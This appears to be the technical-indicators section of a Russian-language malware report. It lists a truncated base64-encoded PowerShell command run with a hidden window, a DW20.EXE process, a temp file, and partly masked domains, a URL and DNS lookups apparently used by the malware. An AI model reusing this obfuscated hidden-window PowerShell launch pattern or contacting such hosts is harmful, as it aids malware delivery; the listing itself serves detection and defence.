Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AEMAbwBrAEEAQgBrAEQAIAA9ACAAJwA0ADkAMwAnADsAJABrAHgAeABRAEEAQQBHAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAE0AUQBfAEEAJwAsACcARAAnACkAOwAkAFEANABHAEEAQQBRAD0AJABlAG4AdgA6AH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1183189.cvr
- 'co###lity.com':443
- 'ca#####actura.com.mx':80
- http://ca#####actura.com.mx/factura_admin/z_u/
- 'co###lity.com':443
- DNS ASK sa###elive.com
- DNS ASK zo####dluxury.ir
- DNS ASK co###lity.com
- DNS ASK lo#####dmatrimonial.com
- DNS ASK ca#####actura.com.mx
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB2AEMAbwBrAEEAQgBrAEQAIAA9ACAAJwA0ADkAMwAnADsAJABrAHgAeABRAEEAQQBHAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBBACcALAAnAE0AUQBfAEEAJwAsACcARAAnACkAOwAkAFEANABHAEEAQQBRAD0AJABlAG4AdgA6AH...' (со скрытым окном)